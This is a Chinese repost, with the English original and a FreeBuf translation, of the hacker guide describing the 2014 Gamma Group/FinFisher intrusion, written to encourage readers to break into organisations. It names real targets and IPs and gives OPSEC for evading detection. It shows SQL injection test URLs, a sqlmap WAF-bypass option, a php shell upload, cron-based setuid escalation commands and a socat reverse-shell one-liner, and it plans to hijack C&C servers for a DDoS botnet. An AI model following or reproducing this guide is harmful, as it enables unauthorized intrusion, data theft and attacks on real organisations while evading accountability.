前言:
有黑客入侵了受争议的英国间谍软件公司Gamma Group International内网,公开了40GB的内部文档和恶意程序源代码(BT种子)。现在,这位匿名黑客公布了一个DIY指南,教你如何入侵目标的网络。指南发布在pastebin上,作者称准黑客首先需要做好安全准备,用加密软件Truecrypt 7.1a制作一个隐藏的加密卷,在这个加密卷内安装Whonix,不要使用与你名字和地址相关联的网络接入,所有的行动都在加密卷内进行。作者也强调,入侵是非法的。
原文:
A DIY Guide for those without the patience to wait for whistleblowers
—[ 1 ]— Introduction
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you’ve learned the basics you’ll realize this really is easier than filing a FOIA request.
—[ 2 ]— Staying Safe
This is illegal, so you’ll need to take same basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it’s better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix,never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you’ll want a public IP address to receive connect back shells. I recommend using servers you’ve hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you’re running will have a nice fast connection to your target.
—[ 3 ]— Mapping out the target
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization.
[0] http://ha.ckers.org/fierce/
For an example let’s take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
Now we do whois lookups and find the homepage of www.academi.com is hosted on Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
Doing a whois lookup on academi.com reveals it’s also registered to the same address, so we’ll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you’ve found everything.
Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
If you repeat the whois lookups and such you’ll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains.
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com
…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.
—[ 4 ]— Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn’t? Sometimes companies will have services running that require no authentication and just assume it’s safe because the url or IP to access it isn’t public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s default password.
3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren’t intended for public viewing like test.company.com or dev.company.com you’ll often find interesting stuff just by looking at them.
2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations.
3) Identify what software is being used on the website. WhatWeb is useful [1]
4) Depending on what software the website is running, use more specific tools like wpscan [2], CMS-Explorer [3], and Joomscan [4].
First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP [5], and some combination of its automated tests along with manually poking around with the help of its intercepting proxy.
6) For the non-custom software they’re running, get a copy to look at. If it’s free software you can just download it. If it’s proprietary you can usually pirate it. If it’s proprietary and obscure enough that you can’t pirate it you can buy it (lame) or find other sites running the same software using google, find one that’s easier to hack, and get a copy from them.
[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/
For finsupport.finfisher.com the process was:
* Start nikto running in the background.
* Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn’t recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”
* I find there’s a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group…”
But it’s really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
* google allinurl:”Scripts/scripts.js.php” and find the other sites
* Notice they’re all sql injectable in the first url parameter I try.
* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with the option —tamper=’tamper/modsecurityversioned.py’
* Acquire the admin login information, login and upload a php shell [1] (the check for allowable file extensions was done client side in javascript), and download the website’s source code.
[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/
Looking through the source code they might as well have named it Damn Vulnerable Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in javascript, and if you’re unauthenticated the admin page just sends you back to the login page with a Location header, but you can have your intercepting proxy filter the Location header out and access it just fine.
Heading back over to the finsupport site, the admin /BackOffice/ page returns 403 Forbidden, and I’m having some issues with the LFI, so I switch to using the sqli (it’s nice to have a dozen options to choose from). The other sites by the web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files. But I can use a short script that uses sqlmap —file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site.
Looking through the source, I see customers can attach a file to their support tickets, and there’s no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I’m in!
—[ 5 ]— (fail at) Escalating
Root over 50% of linux servers you encounter in the wild with two easy scripts,Linux_Exploit_Suggester [0], and unix-privesc-check [1].
[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/
finsupport was running the latest version of Debian with no local root exploits,but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
wait an hour, and ….nothing. Turns out that while the cron process is running it doesn’t seem to be actually running cron jobs. Looking in the webalizer directory shows it didn’t update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that’s probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn’t get much of anything new, so I move on to the rest of the network.
—[ 6 ]— Pivoting
The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport’s local network was another webserver serving up a folder called ‘qateam’ containing their mobile malware.
—[ 7 ]— Have Fun
Once you’re in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there’s no reason to limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2!
—[ 8 ]— Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There’s no one right way, and any method that works is as good as any other. The other main ways that I’ll state without going into detail are:
1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There’s also metasploit browser autopwn, but you’ll probably have better luck with no exploits and a fake flash updater prompt.
2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time.
The infosec industry invented a term to make this sound like some sort of science: “Social Engineering”. This is probably the way to go if you don’t know too much about computers, and it really is all it takes to be a successful hacker [0].
[0] https://www.youtube.com/watch?v=DB6ywr9fngU
—[ 9 ]— Resources
Links:
* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.
Books:
* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc.
—[ 10 ]— Outro
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It’s not selling hacking tools that makes Gamma evil. It’s who their customers are targeting and with what purpose that makes them evil. That’s not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it’s cheaper to attack than to defend it’s harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action.
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
转自:http://www.520html5.com/post/94907536483/gamma-group
————————————————————————————————————————————————
翻译:转自http://www.freebuf.com/articles/web/41809.html
我是如何黑掉英国间谍软件公司Gamma的
前几天,有黑客《入侵了英国间谍软件公司Gamma》。本文翻译自黑客自己公布的入侵指南。详细的介绍了从信息收集,到发现目标站点,以及进行源码审计,绕过waf注入,尝试提权服务器的整个过程。
0×00 开篇
我写这篇文章不是为了吹嘘自己有多牛逼,使用了多高深的技术去搞定Gamma。我只是想揭开黑客技术神秘的面纱,告诉人们黑客技术很普通,你也可以 利用黑客技术去反抗这个世界上那些见不得人的事。如果你没有任何编程或者hacking的经验,那些下面的文章可能会看起来像天书一样。没有关系,文章最 后的参考资料会帮助你慢慢开始。相信我,一旦你有了一些基础之后就会发现hacking这事比信息自由法案的申请简单多了。(filing a FOIA request)。
0×01保护自己
入侵是非法的,所以需要一些基本的措施来保护自己。
1,使用Truecrypt 7.1a制作一个隐藏的加密分区 2,在这个加密分区上安装Whonix系统 3,(可选的)尽管使用Whonix系统,所有的流量都会经过Tor,已经很足够了。但是最好还是不要用自己名字或者地址申请的网络接入点。使用cantenna,aircrack和reaver可以方便的破解无线,接入网络。
只要你遵守一些常识,比如永远不要在Whonix系统之后做hacking相关的事,也不要在Whonix系统中做一些自己日常使用的操作,跟其他 黑客聊天的时候不要透漏自己真实生活的信息,也不要跟身边的朋友吹嘘自己非法入侵的经历。那么你就可以基本不用担心被追踪的问题了。
注意:我并不推荐直接通过Tor进行hacking。对于浏览器来说使用Tor是很方便的。但是对于nmap,sqlmap,nikto之类的黑客 工具,需要发送成千上万的请求,通过Tor使用就会非常慢。更不用说有时候你需要一个公网IP来接受反弹shell了。我推荐使用黑来的服务器或者使用比 特比购买的VPS来进行hacking。然后你跟服务器或者VPS的连接使用Tor。这样就只有很少的命令行的流量通过Tor。速度会快很多。
0×02 收集目标信息
一般我会不断使用fierce,whois和反向whois查询来找到一个组织所有相关的域名和ip。拿Blackwater为例。我们知道他的主页是academi.com。使用fierce.py -dns academi.com查询它的子域名:
67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
然后通过whois查询找到www.academi.com托管在亚马逊云上。其他域名的ip也在下面的段内。
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
对academi.com的whois查询显示也是注册到了上面显示的相同地址。我们可以使用这个地址作为特征进行反向whois查询。我目前知道的反向whois查询都是要花钱的。所以采用替代的方式,用google搜索如下关键词:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
再使用fierce.pl -range参数反查找到的ip段对应的域名。和-dns参数查找新的子域名和ip地址。之后再对结果的域名进行whois查询,如此反复几次知道找到该组织相关的各种信息。
同时google这个组织和访问他们的网站也是收集信息的方式。比如在academi.com上,发现了到一下一些网站的连接:
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
如果在进行一下whois查询的话会发现,academiproshop.com看起来并不是BlackWater管理的,所以把他从我们的感兴趣的名单上去掉。
在 我黑掉finfisher的过程中,找到存在漏洞的站点finsupport.finfisher.com的过程也是一样。在对 finfisher.com进行whois查询,发现注册名字是”FinFisher GmbH”,然后google “FinFisher GmbH” inurl:domaintools 发现一个gamma-international.de域名。当访问gamma-international.de的时候,跳转到了这次的目 标:finsupport.finfisher.com。
现在你已经大概知道我是如何发现目标的。这真的是最重要的一个环节。你发现的攻击面越多,就越可能找到漏洞。
0×03 扫描和利用
使用nmap扫描扫描发现的所有IP段,找到所有开放的服务。除了标准端口扫描,不要忘记扫描SNMP。之后对于发现的每一个服务进行如下的思考:
1,这些服务有没有泄露敏感的信息。有些公司会觉得一些URL或者ip是外人不知道的,就对这些服务没有进行认证。比如fierce可能发现一个git开头的子域名。而你可以通过git.companyname.come/gitweb/来浏览该公司的源码。
2,有没有严重的配置错误。有时候他们可能会开放一些ftp的匿名登陆。甚至匿名登陆有写权限。一些数据库的管理员账号为空。或者一些嵌入式设备(VOIP boxes, IP Cameras, routers etc)保留了制造商使用的默认密码。
3,提供该服务的软件是否有公开利用的exploit。
对于web服务,我们需要单独讨论。对于任何一个web服务,包括nmap找到的那些开放在不常见端口的web服务,我通常都会进行下面一番工作。
1,浏览器访问看一下。尤其是fierce发现的一些看起来不应该对外开放的子域名。比如test.company.com或者dev.company.com。通常你都会发现一些有趣的内容。
2,使用nikto扫描。它会检查类似于webserver/.svn/,webserver/backup/,webserver/phpinfo.php和其他数千种常见的安全问题。
3,识别网站使用的各种软件。使用WhatWeb的效果很好。
4,根据网站运行的软件使用更具针对性的工具,比如wpscan,cms-explorer,joomscan。首先分析所有的服务,查看是否有错误的配置,已公开的漏洞和其他简单的入侵方式,如果没有的话下一步就要尝试去挖掘针对性的漏洞。
5,自己编码的web程序比广泛使用的项目更容易出现漏洞。我一般使用ZAP的自动测试结合一些手动测试来进行漏洞挖掘。
6,对于那些使用通用程序的网站,可以弄一份网站程序自己分析。如果不是开源软件的话,可以考虑买一份或者利用google找到运行者相同程序的网站,找一个容易黑掉的从中弄一份网站源码。
对于finsupport.finfisher.com,我经历的过程大致如下:
运 行nikto开始扫描,同时访问网站,只看到一个登陆框,快速测试了一下登陆框是否存在sql注入,没有发现问题。然后运行whatweb,看看能不能识 别出网站运行的程序。不幸的是whatweb没有识别出来。所以下一个问题我需要解决的就是这是一个自己编码的网站还是通用程序。我查看页面源码,想找个 独一无二的连接去google搜一下。我找到了
Scripts/scripts.js.php
然后搜索:
allinurl:"Scripts/scripts.js.php"
找到了几个运行了相同软件的网站。看起来都是一个小型的公司制作的。每一个网站都是单独设计的,但是公用了很多代码。所以我黑了几个网站,得到了这 个小公司开发的程序源码。写到这里我几乎可以想象亲爱的记者朋友会在新闻中写到:这是一次预谋已久的网络攻击,为了攻陷Gamma,黑客首先黑掉了一个网 站设计公司。但是事实上我只是花了几分钟而已。google allinurl:”Scripts/scripts.js.php”发现的网站,尝试第一个参数就发现SQL注入,只是因为开了apache modsecurity。我使用了sqlmap的tamper参数来绕过waf。具体参数是
--tamper='tamper/modsecurityversioned.py'
。然后获取到管理员登陆密码,登陆后台上传了个php shell。(后台对上传文件的类型判断是在客户端做的)。然后就直接下载了网站源码。
对代码进行了一番审计发现,这个程序可以成得上是Damn VulnerableWeb App 2.0了。包括了sql注入,LFI,上传,未授权访问(未登录访问管理页面的时候会使用location header来跳转到登陆页,只要使用交互式代理去掉location跳转,就可以直接访问管理页面了)等漏洞类型。
回 到finsupport的网站,由于默认管理后台/BackOffice/返回403禁止访问,进行LFI尝试的时候也遇到一些问题,所以最后又转向了利 用SQL注入(反正有足够多的漏洞可以选)。所有这个公司开发的其他网站都有一个存在注入点的print.php文件。简单尝试:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
发现finsupport也存在这个漏洞,而且数据库账号是管理员权限。很可惜的网站开启了魔术引号,所以不能直接INTO OUTFILE写shell。但是我可以读取到网站的源码了。通过不断的寻找include和require的文件,最终下载到了finsupport整 站的源码。通过对代码审计,发现用户可以在提交ticket的时候上传附件,而后台并没有对附件类型进行检查。所以我通过SQL注入得到一个普通用户的账 号,然后上传了一个shell。进入到了finsupport的服务器。
0×04 提权(最终失败了)
< got r00t? >
———–
\ ^__^
\ (oo)\_______
(__)\ )\/\
||—-w |
|| ||
^^^^^^^^^^^^^^^^
基本你遇到的超过50%的linux服务器都可以使用Linux_Exploit_Suggester和unix-privesc-check这两个脚本进行提权。finsupport服务器是最新版的Debian。不过unix-privesc-check返回了如下的信息:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
所以我在/etc/cron.hourly/webalizer添加下面的提权命令:
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
等了一个小时,发现没有反应。分析了发现cron进程虽然存在,但是并不会运行任何cron 的任务。进了webalizer的目录看了一下从上个月开始状态就没更新过了。更新了时区之后,有时候cron会在错误的时间执行或者干脆就不执行了。所 以更新了时区之后一定要要重启cron进程。ls -l /etc/localtime发现,6月6号的时候系统更新过时区。同一时间,webalizer也停止记录状态。看来这就是问题所在了。不过对于这台服 务器来说就是用作web server。我已经获得了所有感兴趣的东西,对于root也就没有那么在意了。接下来继续内网的渗透。
0×05 Pivoting
下一步就是查看下已经被控制的主机所在的网络环境。这个跟一开始的扫描和利用环节很像,只是现在绕过了防火墙,可以发现更多有趣的服务。这时候上传一个nmap用来扫描是非常有效果的。尤其是nfs-*和smb-*系列的nmap 脚本非常有效果。
0×06 Have Fun
一旦你进入了他们的网络,就可以真正做一些有趣的事情了。尽情的发挥你的想象。虽然我写作此文的初衷是为了那些潜在的爆料者,但是不要把自己局限在获得秘密文档上。我黑掉Gamma的最初计划是这样的:
1,黑掉Gamma,获得finSpy的服务端软件 2,寻找FinSpy服务端的漏洞 3,扫描互联网,寻找FinSpy的C&C服务器,然后黑掉他们 4,揪出使用FinSpy的幕后黑手 5,使用控制的C&C服务器在所有感染FinSpy的机器上运行一个小程序,告诉该机器的主人,是谁在背后监控他们。 6,使用C&C服务器在所有的目标上卸载FinFisher 7,把所有的C&C服务器组成一个僵尸网络用来DDoS Gamma的网站。
最终整个黑掉Gamma的计划失败了。没有获得FinSpy 服务端的软件,发现了一些有意思的文档。只能在twitter上嘲笑他们一下下。如果可以破解FinSpy-PC+Mobile-2012-07-12- Final.zip,那我就可以继续第二步了。(FinSpy-PC+Mobile-2012-07-12-Final.zip是加密过的软件)
0×07 其他的方式
上面提到的扫描,漏洞挖掘,漏洞利用仅仅是hack的一种方式。可能更适合有一定编程背景的同学。条条大道通罗马,只要是有效的方法就是好的方法。还有一些常见的方式我并没有仔细讲解,比如:
1, 利用浏览器,falsh,java,微软office的漏洞。给企业员工发送具有诱惑性的邮件,欺骗他们点击邮件中的链接或者打开附件。也可以黑掉企业员 工常去的网站,在该网站上放置利用程序。这种方式被各种政府黑客团体用的比较多。当然你不需要像政府一样花费上百万进行0day的挖掘,或者购买 Finsploit和VUPEN的利用程序。只需要几千块就可以购买一个质量不错的俄罗斯的利用程序套装,还可以把它出租出去进一步降低成本。也可以使用 metasploit。
2,利用人与人之间的信任关系。95%的情况下,人都会选择信任和帮助别人。在信息安全行业里,使用一个听起来很高达上的词”社会工程学”来描述这种攻击。如果你不是很懂计算机的话,可以更多的选择这种方式去hack。
0×08 学习资源
Links:
https://www.pentesterlab.com/exercises/ * http://overthewire.org/wargames/ * http://www.hackthissite.org/ * http://smashthestack.org/ * http://www.win.tue.nl/~aeb/linux/hh/hh.html * http://www.phrack.com/ * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (这个博客的其他文章也都非常优秀) * https://www.corelan.be/ (start at Exploit writing tutorial part 1) * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ 一个小技巧,在大部分的系统中,apache access日志是只有root权限才可以读取的。不过你依然可以进行包含,使用/proc/self/fd/10或者apache访问日志使用的其他fd。 * http://www.dest-unreach.org/socat/
Books:
The Web Application Hacker's Handbook * Hacking: The Art of Exploitation * The Database Hacker's Handbook * The Art of Software Security Assessment * A Bug Hunter's Diary * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier * TCP/IP Illustrated
0×09结尾
你 可能已经注意到我现在讲的这些事可能跟Gamma做的是差不多。hacking仅仅是一种工具。并不是出售黑客工具让Gamma变得邪恶,而是他们的客户 使用他们提供的工具所做的事情是邪恶的。这并不是说工具本身是中立的。hacking是一种进攻性的工具。我写本文的目的是希望hacking变的更加普 及,黑掉Gamma的方法真的很简单,仅仅是典型的SQL注入。你也一样可以做到。
FreeBuf科普
Gamma Group International是一家专门贩卖间谍软件给政府和警察机构的欧洲公司。早在两年前,它家出售的间谍软件就在中东地区广为出现,尤其是巴林,其记 者与反对意见者的手机和计算机都被植入了这些间谍软件。但是对这些说法,Gamma International公司并不承认。
2014年8月,一名黑客入侵了Gamma International内网,公开了40GB的内部文档和恶意程序源代码,揭露了Gamma International的真相。
